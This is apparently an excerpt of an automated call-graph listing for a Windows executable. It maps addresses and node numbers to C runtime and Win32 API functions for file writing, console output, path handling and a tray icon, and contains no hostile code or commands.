280ac9 102341 278db6 9 API calls __cftoa_l 102172->102341 102337 278b28 58 API calls __getptd_noexit 102173->102337 102319 280add 102174->102319 102178 280a89 102338 280ab5 LeaveCriticalSection __unlock_fhandle 102178->102338 102180->102122 102181->102132 102183 27d892 __getstream 102182->102183 102184 27d8b6 102183->102184 102185 27d89f 102183->102185 102187 27d955 102184->102187 102190 27d8ca 102184->102190 102283 278af4 58 API calls __getptd_noexit 102185->102283 102289 278af4 58 API calls __getptd_noexit 102187->102289 102189 27d8a4 102284 278b28 58 API calls __getptd_noexit 102189->102284 102191 27d8f2 102190->102191 102192 27d8e8 102190->102192 102210 27d206 102191->102210 102285 278af4 58 API calls __getptd_noexit 102192->102285 102193 27d8ed 102290 278b28 58 API calls __getptd_noexit 102193->102290 102197 27d8f8 102199 27d91e 102197->102199 102200 27d90b 102197->102200 102286 278b28 58 API calls __getptd_noexit 102199->102286 102219 27d975 102200->102219 102201 27d961 102291 278db6 9 API calls __cftoa_l 102201->102291 102205 27d8ab __getstream 102205->102142 102206 27d917 102288 27d94d LeaveCriticalSection __unlock_fhandle 102206->102288 102207 27d923 102287 278af4 58 API calls __getptd_noexit 102207->102287 102211 27d212 __getstream 102210->102211 102212 27d261 EnterCriticalSection 102211->102212 102214 279c0b __lock 58 API calls 102211->102214 102213 27d287 __getstream 102212->102213 102213->102197 102215 27d237 102214->102215 102218 27d24f 102215->102218 102292 279e2b InitializeCriticalSectionAndSpinCount 102215->102292 102293 27d28b LeaveCriticalSection _doexit 102218->102293 102220 27d982 __write_nolock 102219->102220 102221 27d9c1 102220->102221 102222 27d9e0 102220->102222 102250 27d9b6 102220->102250 102303 278af4 58 API calls __getptd_noexit 102221->102303 102225 27da38 102222->102225 102226 27da1c 102222->102226 102223 27c5f6 __crtLCMapStringA_stat 6 API calls 102227 27e1d6 102223->102227 102230 27da51 102225->102230 102309 2818c1 60 API calls 3 library calls 102225->102309 102306 278af4 58 API calls __getptd_noexit 102226->102306 102227->102206 102228 27d9c6 102304 278b28 58 API calls __getptd_noexit 102228->102304 102294 285c6b 102230->102294 102233 27d9cd 102305 278db6 9 API calls __cftoa_l 102233->102305 102235 27da21 102307 278b28 58 API calls __getptd_noexit 102235->102307 102237 27da5f 102239 27ddb8 102237->102239 102310 2799ac 58 API calls 2 library calls 102237->102310 102241 27ddd6 102239->102241 102242 27e14b WriteFile 102239->102242 102240 27da28 102308 278db6 9 API calls __cftoa_l 102240->102308 102245 27defa 102241->102245 102254 27ddec 102241->102254 102246 27ddab GetLastError 102242->102246 102252 27dd78 102242->102252 102257 27df05 102245->102257 102260 27dfef 102245->102260 102246->102252 102247 27da8b GetConsoleMode 102247->102239 102249 27daca 102247->102249 102248 27e184 102248->102250 102315 278b28 58 API calls __getptd_noexit 102248->102315 102249->102239 102253 27dada GetConsoleCP 102249->102253 102250->102223 102252->102248 102252->102250 102259 27ded8 102252->102259 102253->102248 102279 27db09 102253->102279 102254->102248 102255 27de5b WriteFile 102254->102255 102255->102246 102256 27de98 102255->102256 102256->102254 102261 27debc 102256->102261 102257->102248 102262 27df6a WriteFile 102257->102262 102258 27e1b2 102316 278af4 58 API calls __getptd_noexit 102258->102316 102264 27dee3 102259->102264 102265 27e17b 102259->102265 102260->102248 102266 27e064 WideCharToMultiByte 102260->102266 102261->102252 102262->102246 102267 27dfb9 102262->102267 102312 278b28 58 API calls __getptd_noexit 102264->102312 102314 278b07 58 API calls 3 library calls 102265->102314 102266->102246 102275 27e0ab 102266->102275 102267->102252 102267->102257 102267->102261 102270 27e0b3 WriteFile 102273 27e106 GetLastError 102270->102273 102270->102275 102271 27dee8 102313 278af4 58 API calls __getptd_noexit 102271->102313 102273->102275 102275->102252 102275->102260 102275->102261 102275->102270 102276 2862ba 60 API calls __write_nolock 102276->102279 102277 27dbf2 WideCharToMultiByte 102277->102252 102278 27dc2d WriteFile 102277->102278 102278->102246 102281 27dc5f 102278->102281 102279->102252 102279->102276 102279->102277 102279->102281 102311 2735f5 58 API calls __isleadbyte_l 102279->102311 102280 287a5e WriteConsoleW CreateFileW __putwch_nolock 102280->102281 102281->102246 102281->102252 102281->102279 102281->102280 102282 27dc87 WriteFile 102281->102282 102282->102246 102282->102281 102283->102189 102284->102205 102285->102193 102286->102207 102287->102206 102288->102205 102289->102193 102290->102201 102291->102205 102292->102218 102293->102212 102295 285c76 102294->102295 102297 285c83 102294->102297 102296 278b28 __cftoa_l 58 API calls 102295->102296 102298 285c7b 102296->102298 102299 285c8f 102297->102299 102300 278b28 __cftoa_l 58 API calls 102297->102300 102298->102237 102299->102237 102301 285cb0 102300->102301 102302 278db6 __cftoa_l 9 API calls 102301->102302 102302->102298 102303->102228 102304->102233 102305->102250 102306->102235 102307->102240 102308->102250 102309->102230 102310->102247 102311->102279 102312->102271 102313->102250 102314->102250 102315->102258 102316->102250 102317->102151 102318->102153 102342 27d4c3 102319->102342 102321 280b41 102355 27d43d 59 API calls 2 library calls 102321->102355 102322 280aeb 102322->102321 102323 280b1f 102322->102323 102325 27d4c3 __close_nolock 58 API calls 102322->102325 102323->102321 102326 27d4c3 __close_nolock 58 API calls 102323->102326 102329 280b16 102325->102329 102330 280b2b CloseHandle 102326->102330 102327 280b49 102328 280b6b 102327->102328 102356 278b07 58 API calls 3 library calls 102327->102356 102328->102178 102332 27d4c3 __close_nolock 58 API calls 102329->102332 102330->102321 102333 280b37 GetLastError 102330->102333 102332->102323 102333->102321 102334->102161 102335->102169 102336->102165 102337->102178 102338->102169 102339->102165 102340->102172 102341->102169 102343 27d4e3 102342->102343 102344 27d4ce 102342->102344 102349 27d508 102343->102349 102359 278af4 58 API calls __getptd_noexit 102343->102359 102357 278af4 58 API calls __getptd_noexit 102344->102357 102346 27d4d3 102358 278b28 58 API calls __getptd_noexit 102346->102358 102349->102322 102350 27d512 102360 278b28 58 API calls __getptd_noexit 102350->102360 102351 27d4db 102351->102322 102353 27d51a 102361 278db6 9 API calls __cftoa_l 102353->102361 102355->102327 102356->102328 102357->102346 102358->102351 102359->102350 102360->102353 102361->102351 102424 281940 102362->102424 102365 25477c 102367 257bcc 59 API calls 102365->102367 102366 254799 102430 257d8c 102366->102430 102369 254788 102367->102369 102426 257726 102369->102426 102372 270791 102373 27079e __write_nolock 102372->102373 102374 27079f GetLongPathNameW 102373->102374 102375 257bcc 59 API calls 102374->102375 102376 2572bd 102375->102376 102377 25700b 102376->102377 102378 257667 59 API calls 102377->102378 102379 25701d 102378->102379 102380 254750 60 API calls 102379->102380 102381 257028 102380->102381 102382 257033 102381->102382 102386 28e885 102381->102386 102383 253f74 59 API calls 102382->102383 102385 25703f 102383->102385 102438 2534c2 102385->102438 102387 28e89f 102386->102387 102444 257908 61 API calls 102386->102444 102389 257052 Mailbox 102389->101490 102391 254ddd 136 API calls 102390->102391 102392 25688f 102391->102392 102393 28e031 102392->102393 102394 254ddd 136 API calls 102392->102394 102395 2b955b 122 API calls 102393->102395 102396 2568a3 102394->102396 102397 28e046 102395->102397 102396->102393 102398 2568ab 102396->102398 102399 28e04a 102397->102399 102400 28e067 102397->102400 102402 2568b7 102398->102402 102403 28e052 102398->102403 102404 254e4a 84 API calls 102399->102404 102401 270db6 Mailbox 59 API calls 102400->102401 102423 28e0ac Mailbox 102401->102423 102445 256a8c 102402->102445 102552 2b42f8 90 API calls _wprintf 102403->102552 102404->102403 102408 28e060 102408->102400 102409 28e260 102410 272d55 _free 58 API calls 102409->102410 102411 28e268 102410->102411 102412 254e4a 84 API calls 102411->102412 102417 28e271 102412->102417 102416 272d55 _free 58 API calls 102416->102417 102417->102416 102418 254e4a 84 API calls 102417->102418 102556 2af7a1 89 API calls 4 library calls 102417->102556 102418->102417 102420 257de1 59 API calls 102420->102423 102423->102409 102423->102417 102423->102420 102538 25750f 102423->102538 102546 25735d 102423->102546 102553 2af73d 59 API calls 2 library calls 102423->102553 102554 2af65e 61 API calls 2 library calls 102423->102554 102555 2b737f 59 API calls Mailbox 102423->102555 102425 25475d GetFullPathNameW 102424->102425 102425->102365 102425->102366 102427 257734 102426->102427 102434 257d2c 102427->102434 102429 254794 102429->102372 102431 257da6 102430->102431 102433 257d99 102430->102433 102432 270db6 Mailbox 59 API calls 102431->102432 102432->102433 102433->102369 102435 257d3a 102434->102435 102437 257d43 _memmove 102434->102437 102436 257e4f 59 API calls 102435->102436 102435->102437 102436->102437 102437->102429 102439 2534d4 102438->102439 102443 2534f3 _memmove 102438->102443 102441 270db6 Mailbox 59 API calls 102439->102441 102440 270db6 Mailbox 59 API calls 102442 25350a 102440->102442 102441->102443 102442->102389 102443->102440 102444->102386 102446 256ab5 102445->102446 102447 28e41e 102445->102447 102562 2557a6 60 API calls Mailbox 102446->102562 102629 2af7a1 89 API calls 4 library calls 102447->102629 102450 256ad7 102563 2557f6 67 API calls 102450->102563 102451 28e431 102630 2af7a1 89 API calls 4 library calls 102451->102630 102453 256aec 102453->102451 102455 256af4 102453->102455 102457 257667 59 API calls 102455->102457 102456 28e44d 102459 256b61 102456->102459 102458 256b00 102457->102458 102564 270957 60 API calls __write_nolock 102458->102564 102461 28e460 102459->102461 102462 256b6f 102459->102462 102465 255c6f CloseHandle 102461->102465 102466 257667 59 API calls 102462->102466 102463 256b0c 102464 257667 59 API calls 102463->102464 102467 256b18 102464->102467 102468 28e46c 102465->102468 102469 256b78 102466->102469 102470 254750 60 API calls 102467->102470 102471 254ddd 136 API calls 102468->102471 102472 257667 59 API calls 102469->102472 102473 256b26 102470->102473 102474 28e488 102471->102474 102475 256b81 102472->102475 102565 255850 ReadFile SetFilePointerEx 102473->102565 102477 28e4b1 102474->102477 102481 2b955b 122 API calls 102474->102481 102567 25459b 102475->102567 102631 2af7a1 89 API calls 4 library calls 102477->102631 102480 256b52 102566 255aee SetFilePointerEx SetFilePointerEx 102480->102566 102485 28e4a4 102481->102485 102482 256b98 102486 257b2e 59 API calls 102482->102486 102483 28e4c8 102493 256d0c Mailbox 102483->102493 102488 28e4ac 102485->102488 102489 28e4cd 102485->102489 102487 256ba9 SetCurrentDirectoryW 102486->102487 102495 256bbc Mailbox 102487->102495 102491 254e4a 84 API calls 102488->102491 102490 254e4a 84 API calls 102489->102490 102492 28e4d2 102490->102492 102491->102477 102494 270db6 Mailbox 59 API calls 102492->102494 102557 2557d4 102493->102557 102501 28e506 102494->102501 102497 270db6 Mailbox 59 API calls 102495->102497 102499 256bcf 102497->102499 102498 253bbb 102498->101357 102498->101380 102500 25522e 59 API calls 102499->102500 102527 256bda Mailbox __NMSG_WRITE 102500->102527 102502 25750f 59 API calls 102501->102502 102522 28e54f Mailbox 102502->102522 102503 256ce7 102625 255c6f 102503->102625 102506 28e740 102636 2b72df 59 API calls Mailbox 102506->102636 102507 256cf3 SetCurrentDirectoryW 102507->102493 102510 28e762 102637 2cfbce 59 API calls 2 library calls 102510->102637 102513 28e76f 102515 272d55 _free 58 API calls 102513->102515 102514 28e7d9 102640 2af7a1 89 API calls 4 library calls 102514->102640 102515->102493 102518 25750f 59 API calls 102518->102522 102519 28e7f2 102519->102503 102521 28e7d1 102639 2af5f7 59 API calls 4 library calls 102521->102639 102522->102506 102522->102518 102529 257de1 59 API calls 102522->102529 102533 28e792 102522->102533 102632 2af73d 59 API calls 2 library calls 102522->102632 102633 2af65e 61 API calls 2 library calls 102522->102633 102634 2b737f 59 API calls Mailbox 102522->102634 102635 257213 59 API calls Mailbox 102522->102635 102525 257de1 59 API calls 102525->102527 102527->102503 102527->102514 102527->102521 102527->102525 102618 25586d 67 API calls _wcscpy 102527->102618 102619 256f5d GetStringTypeW 102527->102619 102620 256ecc 60 API calls __wcsnicmp 102527->102620 102621 256faa GetStringTypeW __NMSG_WRITE 102527->102621 102622 27363d GetStringTypeW _iswctype 102527->102622 102623 2568dc 165 API calls 3 library calls 102527->102623 102624 257213 59 API calls Mailbox 102527->102624 102529->102522 102638 2af7a1 89 API calls 4 library calls 102533->102638 102535 28e7ab 102536 272d55 _free 58 API calls 102535->102536 102537 28e7be 102536->102537 102537->102493 102539 2575af 102538->102539 102545 257522 _memmove 102538->102545 102541 270db6 Mailbox 59 API calls 102539->102541 102540 270db6 Mailbox 59 API calls 102542 257529 102540->102542 102541->102545 102543 257552 102542->102543 102544 270db6 Mailbox 59 API calls 102542->102544 102543->102423 102544->102543 102545->102540 102547 257370 102546->102547 102549 25741e 102546->102549 102548 270db6 Mailbox 59 API calls 102547->102548 102551 2573a2 102547->102551 102548->102551 102549->102423 102550 270db6 59 API calls Mailbox 102550->102551 102551->102549 102551->102550 102552->102408 102553->102423 102554->102423 102555->102423 102556->102417 102558 255c6f CloseHandle 102557->102558 102559 2557dc Mailbox 102558->102559 102560 255c6f CloseHandle 102559->102560 102561 2557eb 102560->102561 102561->102498 102562->102450 102563->102453 102564->102463 102565->102480 102566->102459 102568 257667 59 API calls 102567->102568 102569 2545b1 102568->102569 102570 257667 59 API calls 102569->102570 102571 2545b9 102570->102571 102572 257667 59 API calls 102571->102572 102573 2545c1 102572->102573 102574 257667 59 API calls 102573->102574 102575 2545c9 102574->102575 102576 2545fd 102575->102576 102577 28d4d2 102575->102577 102578 25784b 59 API calls 102576->102578 102579 258047 59 API calls 102577->102579 102580 25460b 102578->102580 102581 28d4db 102579->102581 102582 257d2c 59 API calls 102580->102582 102583 257d8c 59 API calls 102581->102583 102584 254615 102582->102584 102586 254640 102583->102586 102585 25784b 59 API calls 102584->102585 102584->102586 102589 254636 102585->102589 102587 254680 102586->102587 102590 25465f 102586->102590 102600 28d4fb 102586->102600 102641 25784b 102587->102641 102593 257d2c 59 API calls 102589->102593 102591 2579f2 59 API calls 102590->102591 102595 254669 102591->102595 102592 254691 102596 2546a3 102592->102596 102598 258047 59 API calls 102592->102598 102593->102586 102594 28d5cb 102597 257bcc 59 API calls 102594->102597 102595->102587 102601 25784b 59 API calls 102595->102601 102599 2546b3 102596->102599 102602 258047 59 API calls 102596->102602 102606 28d588 102597->102606 102598->102596 102604 2546ba 102599->102604 102605 258047 59 API calls 102599->102605 102600->102594 102603 28d5b4 102600->102603 102609 28d532 102600->102609 102601->102587 102602->102599 102603->102594 102611 28d59f 102603->102611 102607 258047 59 API calls 102604->102607 102615 2546c1 Mailbox 102604->102615 102605->102604 102606->102587 102608 2579f2 59 API calls 102606->102608 102654 257924 59 API calls 2 library calls 102606->102654 102607->102615 102608->102606 102610 28d590 102609->102610 102616 28d57b 102609->102616 102612 257bcc 59 API calls 102610->102612 102613 257bcc 59 API calls 102611->102613 102612->102606 102613->102606 102615->102482 102617 257bcc 59 API calls 102616->102617 102617->102606 102618->102527 102619->102527 102620->102527 102621->102527 102622->102527 102623->102527 102624->102527 102626 255c79 102625->102626 102627 255c88 102625->102627 102626->102507 102627->102626 102628 255c8d CloseHandle 102627->102628 102628->102626 102629->102451 102630->102456 102631->102483 102632->102522 102633->102522 102634->102522 102635->102522 102636->102510 102637->102513 102638->102535 102639->102514 102640->102519 102642 2578b7 102641->102642 102643 25785a 102641->102643 102644 257d2c 59 API calls 102642->102644 102643->102642 102645 257865 102643->102645 102646 257888 _memmove 102644->102646 102647 28eb09 102645->102647 102648 257880 102645->102648 102646->102592 102656 258029 102647->102656 102655 257f27 59 API calls Mailbox 102648->102655 102651 28eb13 102652 270db6 Mailbox 59 API calls 102651->102652 102653 28eb33 102652->102653 102654->102606 102655->102646 102657 270db6 Mailbox 59 API calls 102656->102657 102658 258033 102657->102658 102658->102651 102659->101501 102661 256d95 102660->102661 102666 256ea9 102660->102666 102662 270db6 Mailbox 59 API calls 102661->102662 102661->102666 102664 256dbc 102662->102664 102663 270db6 Mailbox 59 API calls 102670 256e31 102663->102670 102664->102663 102666->101505 102668 25735d 59 API calls 102668->102670 102669 25750f 59 API calls 102669->102670 102670->102666 102670->102668 102670->102669 102673 256240 102670->102673 102698 2a6553 59 API calls Mailbox 102670->102698 102671->101507 102672->101509 102699 257a16 102673->102699 102675 25646a 102676 25750f 59 API calls 102675->102676 102683 256484 Mailbox 102676->102683 102679 28dff6 102708 2af8aa 91 API calls 4 library calls 102679->102708 102680 25750f 59 API calls 102694 256265 102680->102694 102683->102670 102685 28e004 102687 25750f 59 API calls 102685->102687 102686 257d8c 59 API calls 102686->102694 102688 28e01a 102687->102688 102688->102683 102689 256799 _memmove 102709 2af8aa 91 API calls 4 library calls 102689->102709 102690 28df92 102691 258029 59 API calls 102690->102691 102693 28df9d 102691->102693 102697 270db6 Mailbox 59 API calls 102693->102697 102694->102675 102694->102679 102694->102680 102694->102686 102694->102689 102694->102690 102695 257e4f 59 API calls 102694->102695 102704 255f6c 60 API calls 102694->102704 102705 255d41 59 API calls Mailbox 102694->102705 102706 255e72 60 API calls 102694->102706 102707 257924 59 API calls 2 library calls 102694->102707 102696 25643b CharUpperBuffW 102695->102696 102696->102694 102697->102689 102698->102670 102700 270db6 Mailbox 59 API calls 102699->102700 102701 257a3b 102700->102701 102702 258029 59 API calls 102701->102702 102703 257a4a 102702->102703 102703->102694 102704->102694 102705->102694 102706->102694 102707->102694 102708->102685 102709->102683 102710->101523 102711->101524 102713 254196 102712->102713 102714 28d423 102712->102714 102713->101533 102738 2b2f94 62 API calls _W_store_winword 102713->102738 102714->102713 102715 28d42c DestroyIcon 102714->102715 102715->102713 102717 25416f Mailbox 102716->102717 102718 254098 102716->102718 102717->101536 102719 257a16 59 API calls 102718->102719 102720 2540a6 102719->102720 102721 28d3c8 LoadStringW 102720->102721 102722 2540b3 102720->102722 102725 28d3e2 102721->102725 102723 257bcc 59 API calls 102722->102723 102724 2540c8 102723->102724 102724->102725 102726 2540d9 102724->102726 102727 257b2e 59 API calls 102725->102727 102728 254174 102726->102728 102729 2540e3 102726->102729 102732 28d3ec 102727->102732 102730 258047 59 API calls 102728->102730 102731 257b2e 59 API calls 102729->102731 102735 2540ed _memset _wcscpy 102730->102735 102731->102735 102733 257cab 59 API calls 102732->102733 102732->102735 102734 28d40e 102733->102734 102736 257cab 59 API calls 102734->102736 102737 254155 Shell_NotifyIconW 102735->102737 102736->102735 102737->102717 102738->101533 102740 25e6d5 102739->102740 102741 25e73f 102740->102741 102742 293aa9 102740->102742 102752 25e799 102740->102752 102746 257667 59 API calls 102741->102746 102741->102752 102909 259ea0 102742->102909 102744 257667 59 API calls 102744->102752 102745 293abe 102769 25e970 Mailbox 102745->102769 102933 2b9e4a 89 API calls 4 library calls 102745->102933 102748 293b04 102746->102748 102750 272d40 __cinit 67 API calls 102748->102750 102749 272d40 __cinit 67 API calls 102749->102752 102750->102752 102751 293b26 102751->101603 102752->102744 102752->102749 102752->102751 102754 25e95a 102752->102754 102752->102769 102753 2584c0 69 API calls 102753->102769 102754->102769 102934 2b9e4a 89 API calls 4 library calls 102754->102934 102755 259ea0 331 API calls 102755->102769 102757 258d40 59 API calls 102757->102769 102760 2b9e4a 89 API calls 102760->102769 102766 293e25 102766->101603 102767 25f195 102938 2b9e4a 89 API calls 4 library calls 102767->102938 102768 25ea78 102768->101603 102769->102753 102769->102755 102769->102757 102769->102760 102769->102767 102769->102768 102908 257f77 59 API calls 2 library calls 102769->102908 102935 2a6e8f 59 API calls 102769->102935 102936 2cc5c3 331 API calls 102769->102936 102937 2cb53c 331 API calls Mailbox 102769->102937 102939 259c90 59 API calls Mailbox 102769->102939 102940 2c93c6 331 API calls Mailbox 102769->102940 102771 25f650 102770->102771 102772 25f4ba 102770->102772 102775 257de1 59 API calls 102771->102775 102773 25f4c6 102772->102773 102774 29441e 102772->102774 103039 25f290 331 API calls 2 library calls 102773->103039 103041 2cbc6b 331 API calls Mailbox 102774->103041 102781 25f58c Mailbox 102775->102781 102778 29442c 102782 25f630 102778->102782 103042 2b9e4a 89 API calls 4 library calls 102778->103042 102780 25f4fd 102780->102778 102780->102781 102780->102782 102788 254e4a 84 API calls 102781->102788 102947 2bcb7a 102781->102947 103027 2b3c37 102781->103027 103030 2c445a 102781->103030 102782->101603 102784 25f5e3 102784->102782 103040 259c90 59 API calls Mailbox 102784->103040 102788->102784 103200 258180 102789->103200 102791 25fd3d 102793 29472d 102791->102793 102837 2606f6 102791->102837 103205 25f234 102791->103205 103222 2b9e4a 89 API calls 4 library calls 102793->103222 102796 294742 102797 29488d 102797->102796 102802 25fe4c 102797->102802 103228 2ca2d9 85 API calls Mailbox 102797->103228 102798 260517 102808 270db6 Mailbox 59 API calls 102798->102808 102799 25fe3e 102799->102797 102799->102802 103226 2a66ec 59 API calls 2 library calls 102799->103226 102801 270db6 59 API calls Mailbox 102830 25fdd3 102801->102830 102809 2948f9 102802->102809 102856 294b53 102802->102856 103209 25837c 102802->103209 102803 2947d7 102803->102796 103224 2b9e4a 89 API calls 4 library calls 102803->103224 102805 294848 103227 2a60ef 59 API calls 2 library calls 102805->103227 102816 260545 _memmove 102808->102816 102817 294917 102809->102817 103230 2585c0 59 API calls Mailbox 102809->103230 102811 294755 102811->102803 103223 25f6a3 331 API calls 102811->103223 102814 2948b2 Mailbox 102814->102802 103229 2a66ec 59 API calls 2 library calls 102814->103229 102823 270db6 Mailbox 59 API calls 102816->102823 102822 294928 102817->102822 103231 2585c0 59 API calls Mailbox 102817->103231 102818 25fea4 102826 25ff32 102818->102826 102827 294ad6 102818->102827 102861 260179 Mailbox _memmove 102818->102861 102819 29486b 102820 259ea0 331 API calls 102819->102820 102820->102797 102822->102861 103232 2a60ab 59 API calls Mailbox 102822->103232 102851 260106 _memmove 102823->102851 102828 270db6 Mailbox 59 API calls 102826->102828 103237 2b9ae7 60 API calls 102827->103237 102832 25ff39 102828->102832 102830->102796 102830->102798 102830->102799 102830->102801 102830->102811 102830->102816 102833 259ea0 331 API calls 102830->102833 102842 29480c 102830->102842 102835 2609d0 331 API calls 102832->102835 102832->102837 102833->102830 102834 259ea0 331 API calls 102836 294a87 102834->102836 102839 25ffb2 102835->102839 102836->102796 102840 2584c0 69 API calls 102836->102840 103221 2b9e4a 89 API calls 4 library calls 102837->103221 102839->102816 102839->102837 102846 25ffe6 102839->102846 102844 294ab2 102840->102844 103225 2b9e4a 89 API calls 4 library calls 102842->103225 103236 2b9e4a 89 API calls 4 library calls 102844->103236 102850 258047 59 API calls 102846->102850 102854 260007 102846->102854 102850->102854 102851->102861 102868 260162 102851->102868 103220 259c90 59 API calls Mailbox 102851->103220 102852 260398 102852->101603 102853 270db6 59 API calls Mailbox 102853->102861 102854->102837 102855 294b24 102854->102855 102859 26004c 102854->102859 103238 259d3c 60 API calls Mailbox 102855->103238 102856->102796 103239 2b9e4a 89 API calls 4 library calls 102856->103239 102858 2600d8 103216 259d3c 60 API calls Mailbox 102858->103216 102859->102837 102859->102856 102859->102858 102861->102837 102861->102844 102861->102852 102861->102853 102862 294a1c 102861->102862 102867 294a4d 102861->102867 103218 258740 68 API calls __cinit 102861->103218 103219 258660 68 API calls 102861->103219 103233 2b5937 68 API calls 102861->103233 103234 2589b3 69 API calls Mailbox 102861->103234 103235 259d3c 60 API calls Mailbox 102861->103235 102865 270db6 Mailbox 59 API calls 102862->102865 102863 2600eb 102863->102837 103217 2582df 59 API calls Mailbox 102863->103217 102865->102867 102867->102834 102868->101603 102869->101603 102870->101603 102871->101542 102872->101547 102873->101603 102874->101552 102875->101552 102876->101552 102877->101603 102878->101603 102879->101603 102881 259851 102880->102881 102882 25984b 102880->102882 102883 28f5d3 __i64tow 102881->102883 102884 259899 102881->102884 102886 259857 __itow 102881->102886 102889 28f4da 102881->102889 102882->101603 103242 273698 83 API calls 3 library calls 102884->103242 102888 270db6 Mailbox 59 API calls 102886->102888 102890 259871 102888->102890 102891 270db6 Mailbox 59 API calls 102889->102891 102896 28f552 Mailbox _wcscpy 102889->102896 102890->102882 102892 257de1 59 API calls 102890->102892 102893 28f51f 102891->102893 102892->102882 102894 270db6 Mailbox 59 API calls 102893->102894 102895 28f545 102894->102895 102895->102896 102897 257de1 59 API calls 102895->102897 103243 273698 83 API calls 3 library calls 102896->103243 102897->102896 102898->101603 102899->101603 102900->101603 102901->101597 102902->101597 102903->101597 102904->101597 102905->101597 102906->101597 102907->101597 102908->102769 102910 259ebf 102909->102910 102930 259eed Mailbox 102909->102930 102911 270db6 Mailbox 59 API calls 102910->102911 102911->102930 102912 25b475 102913 258047 59 API calls 102912->102913 102920 25a057 102913->102920 102914 25b47a 102915 2909e5 102914->102915 102916 290055 102914->102916 102946 2b9e4a 89 API calls 4 library calls 102915->102946 102943 2b9e4a 89 API calls 4 library calls 102916->102943 102920->102745 102921 25a55a 102944 2b9e4a 89 API calls 4 library calls 102921->102944 102922 290064 102922->102745 102923 270db6 59 API calls Mailbox 102923->102930 102925 258047 59 API calls 102925->102930 102927 257667 59 API calls 102927->102930 102928 272d40 67 API calls __cinit 102928->102930 102929 2a6e8f 59 API calls 102929->102930 102930->102912 102930->102914 102930->102916 102930->102920 102930->102921 102930->102923 102930->102925 102930->102927 102930->102928 102930->102929 102931 2909d6 102930->102931 102941 25c8c0 331 API calls 2 library calls 102930->102941 102942 25b900 60 API calls Mailbox 102930->102942 102945 2b9e4a 89 API calls 4 library calls 102931->102945 102933->102769 102934->102769 102935->102769 102936->102769 102937->102769 102938->102766 102939->102769 102940->102769 102941->102930 102942->102930 102943->102922 102944->102920 102945->102915 102946->102920 102948 257667 59 API calls 102947->102948 102949 2bcbaf 102948->102949 102950 257667 59 API calls 102949->102950 102951 2bcbb8 102950->102951 102952 2bcbcc 102951->102952 103152 259b3c 59 API calls 102951->103152 102954 259837 84 API calls 102952->102954 102955 2bcbe9 102954->102955 102956 2bcc0b 102955->102956 102957 2bccea 102955->102957 102962 2bcd1a Mailbox 102955->102962 102958 259837 84 API calls 102956->102958 102959 254ddd 136 API calls 102957->102959 102960 2bcc17 102958->102960 102961 2bccfe 102959->102961 102963 258047 59 API calls 102960->102963 102964 2bcd16 102961->102964 102965 254ddd 136 API calls 102961->102965 102962->102784 102967 2bcc23 102963->102967 102964->102962 102966 257667 59 API calls 102964->102966 102965->102964 102968 2bcd4b 102966->102968 102970 2bcc69 102967->102970 102971 2bcc37 102967->102971 102969 257667 59 API calls 102968->102969 102972 2bcd54 102969->102972 102974 259837 84 API calls 102970->102974 102973 258047 59 API calls 102971->102973 102975 257667 59 API calls 102972->102975 102976 2bcc47 102973->102976 102977 2bcc76 102974->102977 102978 2bcd5d 102975->102978 102979 257cab 59 API calls 102976->102979 102980 258047 59 API calls 102977->102980 102981 257667 59 API calls 102978->102981 102982 2bcc51 102979->102982 102983 2bcc82 102980->102983 102984 2bcd66 102981->102984 102986 259837 84 API calls 102982->102986 103153 2b4a31 GetFileAttributesW 102983->103153 102985 259837 84 API calls 102984->102985 102988 2bcd73 102985->102988 102989 2bcc5d 102986->102989 102992 25459b 59 API calls 102988->102992 102993 257b2e 59 API calls 102989->102993 102990 2bcc8b 102991 2bcc9e 102990->102991 102994 2579f2 59 API calls 102990->102994 102996 259837 84 API calls 102991->102996 103002 2bcca4 102991->103002 102995 2bcd8e 102992->102995 102993->102970 102994->102991 102997 2579f2 59 API calls 102995->102997 102998 2bcccb 102996->102998 102999 2bcd9d 102997->102999 103154 2b37ef 75 API calls Mailbox 102998->103154 103001 2bcdd1 102999->103001 103003 2579f2 59 API calls 102999->103003 103004 258047 59 API calls 103001->103004 103002->102962 103005 2bcdae 103003->103005 103006 2bcddf 103004->103006 103005->103001 103009 257bcc 59 API calls 103005->103009 103007 257b2e 59 API calls 103006->103007 103011 2bcdc3 103009->103011 103013 257bcc 59 API calls 103011->103013 103013->103001 103195 2b445a GetFileAttributesW 103027->103195 103031 259837 84 API calls 103030->103031 103032 2c4494 103031->103032 103033 256240 94 API calls 103032->103033 103034 2c44a4 103033->103034 103035 2c44c9 103034->103035 103036 259ea0 331 API calls 103034->103036 103038 2c44cd 103035->103038 103199 259a98 59 API calls Mailbox 103035->103199 103036->103035 103038->102784 103039->102780 103040->102784 103041->102778 103042->102782 103152->102952 103153->102990 103154->103002 103196 2b4475 FindFirstFileW 103195->103196 103198 2b3c3e 103195->103198 103197 2b448a FindClose 103196->103197 103196->103198 103197->103198 103198->102784 103199->103038 103201 25818f 103200->103201 103204 2581aa 103200->103204 103202 257e4f 59 API calls 103201->103202 103203 258197 CharUpperBuffW 103202->103203 103203->103204 103204->102791 103206 25f251 103205->103206 103207 25f272 103206->103207 103240 2b9e4a 89 API calls 4 library calls 103206->103240 103207->102830 103210 28edbd 103209->103210 103211 25838d 103209->103211 103212 270db6 Mailbox 59 API calls 103211->103212 103213 258394 103212->103213 103214 2583b5 103213->103214 103241 258634 59 API calls Mailbox 103213->103241 103214->102809 103214->102818 103216->102863 103217->102851 103218->102861 103219->102861 103220->102851 103221->102793 103222->102796 103223->102803 103224->102796 103225->102796 103226->102805 103227->102819 103228->102814 103229->102814 103230->102817 103231->102822 103232->102861 103233->102861 103234->102861 103235->102861 103236->102796 103237->102846 103238->102856 103239->102796 103240->103207 103241->103214 103242->102886 103243->102883 103245 257c5f __NMSG_WRITE 103244->103245 103246 258029 59 API calls 103245->103246 103247 257c70 _memmove 103245->103247 103248 28ed07 _memmove 103246->103248 103247->101633 103250 257a5f 103249->103250 103251 257a85 _memmove 103249->103251 103250->103251 103252 270db6 Mailbox 59 API calls 103250->103252 103251->101640 103253 257ad4 103252->103253 103254 270db6 Mailbox 59 API calls 103253->103254 103254->103251 103255->101641 103256 251016 103261 254974 103256->103261 103259 272d40 __cinit 67 API calls 103260 251025 103259->103260 103262 270db6 Mailbox 59 API calls 103261->103262 103263 25497c 103262->103263 103264 25101b 103263->103264 103268 254936 103263->103268 103264->103259 103269 254951 103268->103269 103270 25493f 103268->103270 103272 2549a0 103269->103272 103271 272d40 __cinit 67 API calls 103270->103271 103271->103269 103273 257667 59 API calls 103272->103273 103274 2549b8 GetVersionExW 103273->103274 103275 